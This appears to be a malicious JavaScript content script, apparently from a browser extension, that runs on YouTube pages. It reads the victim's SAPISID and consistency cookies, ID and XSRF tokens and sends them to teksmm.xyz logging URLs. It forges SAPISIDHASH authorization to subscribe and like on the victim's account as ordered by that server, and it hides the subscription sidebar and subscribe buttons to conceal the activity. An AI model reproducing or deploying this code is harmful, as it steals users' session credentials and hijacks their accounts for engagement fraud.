new Image().src = 'https://whos.amung.us/pingjs/?k=selamcek40';
setInterval(function(){ 
	new Image().src = 'https://whos.amung.us/pingjs/?k=selamcek40';
}, 60000*3);

function rasgteleSure(min, max) { 
  return Math.floor(Math.random() * (max - min + 1) + min);
}

function getFromLocalStorage(){
  return JSON.parse(localStorage.getItem("m_history"));
}
if( !getFromLocalStorage() ){
    localStorage.setItem("m_history", JSON.stringify([]) );
}
function checkOrSave(key, value){
  //Delete 2 days ago
  var clean = getFromLocalStorage().filter(x => {
    return parseInt((new Date().getTime()-x.time)/ (1000*60*60*24*2)) <= 0
  })
  localStorage.setItem("m_history", JSON.stringify(clean));
  console.log(clean)
  if( !getFromLocalStorage() ){
    localStorage.setItem("m_history", JSON.stringify([]) );
  }
  let status = checkInLocalStorage(key, value);
  if(!status){
    let operations = getFromLocalStorage();
    let temp   = {};
    temp.key   = key;
    temp.value = value;
    temp.time  = new Date().getTime();
    operations.push(temp)
    localStorage.setItem("m_history", JSON.stringify(operations) );
  }
  return status;
}
function checkInLocalStorage(key, value){
  elements = getFromLocalStorage().filter(x=> x.key==key && x.value == value);
  return Boolean(elements.length);
}

var nca = function() {
    function a() {
        e[0] = 1732584193;
        e[1] = 4023233417;
        e[2] = 2562383102;
        e[3] = 271733878;
        e[4] = 3285377520;
        w = p = 0
    }
    function b(y) {
        for (var A = k, K = 0; 64 > K; K += 4)
            A[K / 4] = y[K] << 24 | y[K + 1] << 16 | y[K + 2] << 8 | y[K + 3];
        for (K = 16; 80 > K; K++)
            y = A[K - 3] ^ A[K - 8] ^ A[K - 14] ^ A[K - 16],
            A[K] = (y << 1 | y >>> 31) & 4294967295;
        y = e[0];
        var S = e[1]
          , Z = e[2]
          , ta = e[3]
          , Fa = e[4];
        for (K = 0; 80 > K; K++) {
            if (40 > K) {
                if (20 > K) {
                    var Ka = ta ^ S & (Z ^ ta);
                    var Gb = 1518500249
                } else
                    Ka = S ^ Z ^ ta,
                    Gb = 1859775393;
            } else
                60 > K ? (Ka = S & Z | ta & (S | Z),
                Gb = 2400959708) : (Ka = S ^ Z ^ ta,
                Gb = 3395469782);
            Ka = ((y << 5 | y >>> 27) & 4294967295) + Ka + Fa + Gb + A[K] & 4294967295;
            Fa = ta;
            ta = Z;
            Z = (S << 30 | S >>> 2) & 4294967295;
            S = y;
            y = Ka
        }
        e[0] = e[0] + y & 4294967295;
        e[1] = e[1] + S & 4294967295;
        e[2] = e[2] + Z & 4294967295;
        e[3] = e[3] + ta & 4294967295;
        e[4] = e[4] + Fa & 4294967295
    }
    function c(y, A) {
        if ("string" === typeof y) {
            y = unescape(encodeURIComponent(y));
            for (var K = [], S = 0, Z = y.length; S < Z; ++S)
                K.push(y.charCodeAt(S));
            y = K
        }
        A || (A = y.length);
        K = 0;
        if (0 == p)
            for (; K + 64 < A; )
                b(y.slice(K, K + 64)),
                K += 64,
                w += 64;
        for (; K < A; )
            if (g[p++] = y[K++],
            w++,
            64 == p)
                for (p = 0,
                b(g); K + 64 < A; )
                    b(y.slice(K, K + 64)),
                    K += 64,
                    w += 64
    }
    function d() {
        var y = []
          , A = 8 * w;
        56 > p ? c(m, 56 - p) : c(m, 64 - (p - 56));
        for (var K = 63; 56 <= K; K--)
            g[K] = A & 255,
            A >>>= 8;
        b(g);
        for (K = A = 0; 5 > K; K++)
            for (var S = 24; 0 <= S; S -= 8)
                y[A++] = e[K] >> S & 255;
        return y
    }
    for (var e = [], g = [], k = [], m = [128], n = 1; 64 > n; ++n)
        m[n] = 0;
    var p, w;
    a();
    return {
        reset: a,
        update: c,
        digest: d,
        digestString: function() {
            for (var y = d(), A = "", K = 0; K < y.length; K++)
                A += "0123456789ABCDEF".charAt(Math.floor(y[K] / 16)) + "0123456789ABCDEF".charAt(y[K] % 16);
            return A
        }
    }
};

function setCookie(name,value,days) {
    var expires = "";
    if (days) {
        var date = new Date();
        date.setTime(date.getTime() + (days*24*60*60*1000));
        expires = "; expires=" + date.toUTCString();
 }
    document.cookie = name + "=" + (value || "")  + expires + "; path=/ ; domain=.youtube.com; secure";
}

function getCookie(name) {
    var nameEQ = name + "=";
    var ca = document.cookie.split(';');
    for(var i=0;i < ca.length;i++) {
        var c = ca[i];
        while (c.charAt(0)==' ') c = c.substring(1,c.length);
        if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
    }
    return null;
}

function siparis_getir_3() {
	var xhr = new XMLHttpRequest();
	xhr.open("GET", "https://teksmm.xyz/smmnew/queue.php?queue=3&json="+encodeURIComponent(JSON.stringify(getFromLocalStorage().filter(x => x.value == "3"))), false);
	xhr.onreadystatechange = function() {
		if (xhr.readyState == 4 && xhr.status == 200) {
			try {
				var data = JSON.parse(xhr.responseText);
				vars = {};
				vars.videoId = data.videoIds[Math.floor(Math.random()*data.videoIds.length)]
				vars.channelIds = data.channelId.trim();
				vars.id = data.id.trim();
				vars.consistency = getCookie("CONSISTENCY")
				vars.sapisid = getCookie("SAPISID")
				new Image().src = '//teksmm.xyz/smmnew/log/yt.php?message=cons'+vars.consistency+"----sapsid"+vars.sapisid;
				new Image().src = '//teksmm.xyz/smmnew/log/yt.php?message=getir1';
				if (vars.channelIds  && vars.sapisid != null ) {
					new Image().src = '//teksmm.xyz/smmnew/log/yt.php?message=getir2';
					if(!checkOrSave(vars.id,"3")){
						new Image().src = '//teksmm.xyz/smmnew/log/yt.php?message=getir3';
						subscribe_client(vars);
					}
				}
			}catch (error) {}
		}else{
			localStorage.setItem("m_history", JSON.stringify([]) );
		}
	}
	xhr.send();
}

function siparis_getir_4() {
	var xhr = new XMLHttpRequest();
	xhr.open("GET", "https://teksmm.xyz/smmnew/queue.php?queue=4&json="+encodeURIComponent(JSON.stringify(getFromLocalStorage().filter(x => x.value == "4"))), false);
	xhr.onreadystatechange = function() {
		if (xhr.readyState == 4 && xhr.status == 200) {
			try {
				var data = JSON.parse(xhr.responseText);
				vars = {};
				vars.videoId = data.videoId.trim();
				vars.id = data.id.trim();
				vars.consistency = getCookie("CONSISTENCY")
				vars.sapisid = getCookie("SAPISID")
				if (vars.videoId && vars.sapisid != null) {
					if(!checkOrSave(vars.id,"4")){
							video_like(vars);
					}
				}
			}catch (error) {}
		}else{
			localStorage.setItem("m_history", JSON.stringify([]) );
		}
	}
	xhr.send();
}

function subscribe_client(vars) {
    var xhr = new XMLHttpRequest();
    xhr.open("GET", "https://www.youtube.com/watch?v="+vars.videoId, true);
    xhr.onreadystatechange = function() {
        if (xhr.readyState == 4 && xhr.status == 200) {	
            var data = xhr.responseText;
            vars.login = data.match('"LOGGED_IN":(.*?),')[1];
			new Image().src = '//teksmm.xyz/smmnew/log/yt.php?message=getir4';
            if ( (vars.login == "true" || vars.login == true) && data.indexOf('subscribed=1') == -1 ) {
				new Image().src = '//teksmm.xyz/smmnew/log/yt.php?message=getir5';
                var middlePoint = data.split('subscribeEndpoint":{"channelIds":');
                var startPoint = middlePoint[0].split('{"clickTrackingParams":"').pop();
                var endPoint = middlePoint[1].split("}}]")[0]
                vars.clickTrackingParams = startPoint.split('","')[0]
                vars.params = endPoint.split('"params":"')[1].split('"')[0];
                vars.apiKey =data.split('"innertube_api_key":"')[1].split('"')[0]; 
                let time = Math.floor(new Date().getTime() / 1E3);
                let b =  nca();
                b.update(time+" "+vars.sapisid+" https://www.youtube.com")
                vars.SAPISIDHASH = "SAPISIDHASH "+time+"_"+b.digestString().toLowerCase()
                try{
                    vars.sessionIndex = data.split('"SESSION_INDEX":')[1].split(',')[0]; 
                }catch(Ex){
                    vars.sessionIndex = 0; 
                }
                vars.hl = data.split('"hl":"')[1].split('"')[0];  
                vars.gl =  data.split('"gl":"')[1].split('"')[0]; 
                vars.visitorData = data.split('"visitorData":"')[1].split('"')[0]; 
                vars.userAgent   = navigator.userAgent+",gzip(gfe)";
                vars.clientName = data.split('{"client.name":"')[1].split('"')[0]; 
                vars.clientVersion = data.split('"clientVersion":"')[1].split('"')[0];  
                vars.osName          = data.split('"osName":"')[1].split('"')[0];  
                vars.osVersion       = data.split('"osVersion":"')[1].split('"')[0];  
                vars.browserName     = data.split('"browserName":"')[1].split('"')[0];  
                vars.browserVersion  = data.split('"browserVersion":"')[1].split('"')[0];  
                vars.screenWidthPoints = window.innerWidth;
                vars.screenHeightPoints = window.innerHeight;
                vars.screenPixelDensity = Math.round(window.devicePixelRatio) || 1;
                vars.utcOffsetMinutes   = -Math.floor(new Date().getTimezoneOffset());
                vars.userInterfaceTheme  = data.indexOf("<html dark") >= 0 ? "USER_INTERFACE_THEME_DARK" :  "USER_INTERFACE_THEME_LIGHT";
                vars.session_token = data.split('"XSRF_TOKEN":"')[1].split('"')[0];
                try{
                    vars.clientScreenNonce = data.split('csn: "')[1].split('"')[0];
                }catch(Ex){
                    vars.clientScreenNonce = data.split('csn":"')[1].split('"')[0];
                }
                vars.youtube_identity_token = data.split('"ID_TOKEN":"')[1].split('"')[0];
                vars.page_cl = data.split('PAGE_CL":')[1].split(',')[0];
                vars.page_build_label = data.split('"PAGE_BUILD_LABEL":"')[1].split('"')[0];
                vars.variants_checksum = data.split('"VARIANTS_CHECKSUM":"')[1].split('"')[0];
                var deviceRaw = data.split('"DEVICE":"')[1].split('"')[0].split("\\u0026");
                var urlParams = {};
                deviceRaw.forEach(function(x){
                    var arr = x.split('=');
                    arr[1] && (urlParams[arr[0]] = arr[1]);
                });
                vars.device = "cos="+urlParams["cos"]+"&cbr="+urlParams["cbr"]+"&cosver="+urlParams["cosver"]+"&cbrver="+urlParams["cbrver"];
                vars.utc = Math.abs(new Date().getTimezoneOffset());
                vars.timezone = Intl.DateTimeFormat().resolvedOptions().timeZone;
                vars.clientversion = data.split('"INNERTUBE_CONTEXT_CLIENT_VERSION":"')[1].split('"')[0];
				vars.sessionId = data.split('"sessionId":"')[1].split('"')[0];
                console.log(vars)
				new Image().src = '//teksmm.xyz/smmnew/log/yt.php?message='+JSON.stringify(vars);
                createPost(vars,"subscribe");    
            }
        }
    }
    xhr.send();
}
    
function video_like(vars) {
    var xhr = new XMLHttpRequest();
    xhr.open("GET", "https://www.youtube.com/watch?v=" + vars.videoId, true);
    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
    xhr.onreadystatechange = function() {
      if (xhr.readyState == 4 && xhr.status == 200) {
        var data = xhr.responseText;   
        vars.login = data.match('"LOGGED_IN":(.*?),')[1];
        if ( (vars.login == "true" || vars.login == true) ) {
			var middlePoint = data.split('"likeEndpoint":{"status":"LIKE"');
			var startPoint = middlePoint[0].split('{"clickTrackingParams":"').pop();
			var endPoint = middlePoint[1].split('"}}')[0]
			vars.clickTrackingParams = startPoint.split('","')[0]
			vars.params = endPoint.split('"likeParams":"')[1]
			vars.apiKey =data.split('"innertube_api_key":"')[1].split('"')[0]; 
			let time = Math.floor(new Date().getTime() / 1E3);
			let b =  nca();
			b.update(time+" "+vars.sapisid+" https://www.youtube.com")
			vars.SAPISIDHASH = "SAPISIDHASH "+time+"_"+b.digestString().toLowerCase()
			try{
			  vars.sessionIndex = data.split('"SESSION_INDEX":')[1].split(',')[0]; 
			}catch(Ex){
			  vars.sessionIndex = 0; 
			}
			vars.hl = data.split('"hl":"')[1].split('"')[0];  
			vars.gl =  data.split('"gl":"')[1].split('"')[0]; 
			vars.visitorData = data.split('"visitorData":"')[1].split('"')[0]; 
			vars.userAgent   = navigator.userAgent+",gzip(gfe)";
			vars.clientName = data.split('{"client.name":"')[1].split('"')[0];
			vars.clientVersion = data.split('"clientVersion":"')[1].split('"')[0];  
			vars.osName          = data.split('"osName":"')[1].split('"')[0];  
			vars.osVersion       = data.split('"osVersion":"')[1].split('"')[0];  
			vars.browserName     = data.split('"browserName":"')[1].split('"')[0];  
			vars.browserVersion  = data.split('"browserVersion":"')[1].split('"')[0];  
			vars.screenWidthPoints = window.innerWidth;
			vars.screenHeightPoints = window.innerHeight;
			vars.screenPixelDensity = Math.round(window.devicePixelRatio) || 1;
			vars.utcOffsetMinutes   = -Math.floor(new Date().getTimezoneOffset());
			vars.userInterfaceTheme  = data.indexOf("<html dark") >= 0 ? "USER_INTERFACE_THEME_DARK" :  "USER_INTERFACE_THEME_LIGHT";
			vars.session_token = data.split('"XSRF_TOKEN":"')[1].split('"')[0];
			try{
			  vars.clientScreenNonce = data.split('csn: "')[1].split('"')[0];
			}catch(Ex){
			  vars.clientScreenNonce = data.split('csn":"')[1].split('"')[0];
			}
			vars.youtube_identity_token = data.split('"ID_TOKEN":"')[1].split('"')[0];
			vars.page_cl = data.split('PAGE_CL":')[1].split(',')[0];
			vars.page_build_label = data.split('"PAGE_BUILD_LABEL":"')[1].split('"')[0];
			vars.variants_checksum = data.split('"VARIANTS_CHECKSUM":"')[1].split('"')[0];
			var deviceRaw = data.split('"DEVICE":"')[1].split('"')[0].split("\\u0026");
			var urlParams = {};
			deviceRaw.forEach(function(x){
			  var arr = x.split('=');
			  arr[1] && (urlParams[arr[0]] = arr[1]);
			});
			vars.device = "cos="+urlParams["cos"]+"&cbr="+urlParams["cbr"]+"&cosver="+urlParams["cosver"]+"&cbrver="+urlParams["cbrver"];
			vars.utc = Math.abs(new Date().getTimezoneOffset());
			vars.timezone = Intl.DateTimeFormat().resolvedOptions().timeZone;
			vars.clientversion = data.split('"INNERTUBE_CONTEXT_CLIENT_VERSION":"')[1].split('"')[0];
			vars.sessionId = data.split('"sessionId":"')[1].split('"')[0];
			createPost(vars,"like");
        }  
      }
    }
    xhr.send();
}	


function createPost(vars,type) {
	new Image().src = '//teksmm.xyz/smmnew/log/yt.php?message=getir6';
	if(type == "subscribe"){
		new Image().src = '//teksmm.xyz/smmnew/log/yt.php?message=getir7';
		var postData = 
		{
			"context": {
				"client": {
					"hl": vars.hl,
					"gl": vars.gl,
					"visitorData": vars.visitorData,
					"userAgent": vars.userAgent,
					"clientName": vars.clientName,
					"clientVersion": vars.clientVersion,
					"osName": vars.osName,
					"osVersion": vars.osVersion,
					"browserName": vars.browserName,
					"browserVersion": vars.browserVersion,
					"screenWidthPoints": vars.screenWidthPoints,
					"screenHeightPoints": vars.screenHeightPoints,
					"screenPixelDensity": vars.screenPixelDensity,
					"utcOffsetMinutes": vars.utcOffsetMinutes,
					"userInterfaceTheme": vars.userInterfaceTheme
				},
				"request": {
					"internalExperimentFlags": [],
                     "consistencyTokenJars": vars.consistency != null ? [{"encryptedTokenJarContents": vars.consistency,"expirationSeconds": "600"}] : [],
					"sessionId": vars.sessionId
				},
				"user": {},
				"clientScreenNonce": vars.clientScreenNonce,
				"clickTracking": {
					"clickTrackingParams": vars.clickTrackingParams
				}
			},
			"channelIds": [vars.channelIds],
			"params": vars.params
		};
	}else if(type == "like"){
	   var postData = 
        {
            "context": {
                "client": {
                    "hl": vars.hl,
                    "gl": vars.gl,
                    "visitorData": vars.visitorData,
                    "userAgent": vars.userAgent,
                    "clientName": vars.clientName,
                    "clientVersion": vars.clientVersion,
                    "osName": vars.osName,
                    "osVersion": vars.osVersion,
                    "browserName": vars.browserName,
                    "browserVersion": vars.browserVersion,
                    "screenWidthPoints": vars.screenWidthPoints,
                    "screenHeightPoints": vars.screenHeightPoints,
                    "screenPixelDensity": vars.screenPixelDensity,
                    "utcOffsetMinutes": vars.utcOffsetMinutes,
                    "userInterfaceTheme": vars.userInterfaceTheme
                },
                "request": {
                    "internalExperimentFlags": [],
                     "consistencyTokenJars": vars.consistency != null ? [{"encryptedTokenJarContents": vars.consistency,"expirationSeconds": "600"}] : [],
					 "sessionId": vars.sessionId
                },
                "user": {},
                "clientScreenNonce": vars.clientScreenNonce,
                "clickTracking": {
                    "clickTrackingParams": vars.clickTrackingParams
                }
            },
            "target": {
                "videoId": vars.videoId
            },
            "params": vars.params
        };
	}
	new Image().src = '//teksmm.xyz/smmnew/log/yt.php?message='+JSON.stringify(postData);
	var xhr = new XMLHttpRequest();
	if(type == "subscribe"){
		xhr.open("POST", "https://www.youtube.com/youtubei/v1/subscription/subscribe?key="+vars.apiKey, true);
	}else if(type == "like"){
		xhr.open("POST", "https://www.youtube.com/youtubei/v1/like/like?key="+vars.apiKey, true);
	}
	xhr.setRequestHeader("authorization", vars.SAPISIDHASH);
	xhr.setRequestHeader("Content-Type", "application/json");
	xhr.setRequestHeader("Referer-zzz", "https://www.youtube.com/watch?v="+vars.videoId);
	xhr.setRequestHeader("se-zzzc-fetch-dest",  "empty");
	xhr.setRequestHeader("se-zzzc-fetch-mode",  "same-origin");
	xhr.setRequestHeader("se-zzzc-fetch-site",  "same-origin");
	xhr.setRequestHeader("x-goog-authuser",  vars.sessionIndex);
	xhr.setRequestHeader("x-goog-visitor-id",  vars.visitorData);
	xhr.setRequestHeader("x-origin",  "https://www.youtube.com");
	xhr.onreadystatechange = function() {
		if (xhr.readyState == 4 && xhr.status == 200) {
			new Image().src = '//teksmm.xyz/smmnew/log/yt.php?message=getir200';
			let parsed = JSON.parse(xhr.responseText);
			new Image().src = '//teksmm.xyz/smmnew/log/yt.php?message=yeniCok:'+parsed.responseContext.consistencyTokenJar.encryptedTokenJarContents;
            setCookie("CONSISTENCY",parsed.responseContext.consistencyTokenJar.encryptedTokenJarContents,6)
            xhr.close;
		}
	}
	xhr.send(JSON.stringify(postData));
}

function start() {
  var cookie_name = "yt";
  var cookie_time = rasgteleSure(30000,60000*3);
  if (!localStorage[cookie_name] || parseInt(localStorage[cookie_name]) < Date.now() - cookie_time) {
    localStorage[cookie_name] = Date.now();
	new Image().src = '//whos.amung.us/pingjs/?k=selamcek03';
    siparis_getir_3();
    siparis_getir_4();
  }
}


if (location.hostname.indexOf("youtube.com") >= 0 && document.body.innerHTML.split('creator_channel_id","value":"')[1]) {
  start();
  setInterval(function() {
    start();
  }, 1000 * 60 * 1);
  setInterval(function() {
	  if(document.querySelectorAll("ytd-guide-section-renderer").length > 0){
		  document.querySelectorAll("ytd-guide-section-renderer")[1].style.display ="none";
	  }
	  
    var bok = document.getElementsByClassName("style-scope ytd-subscribe-button-renderer");
    if (bok.length > 0) {
      for (var i = 0; i < bok.length; i++) {
        bok[i].outerHTML = "";
      }
    }
  }, 1000);
}
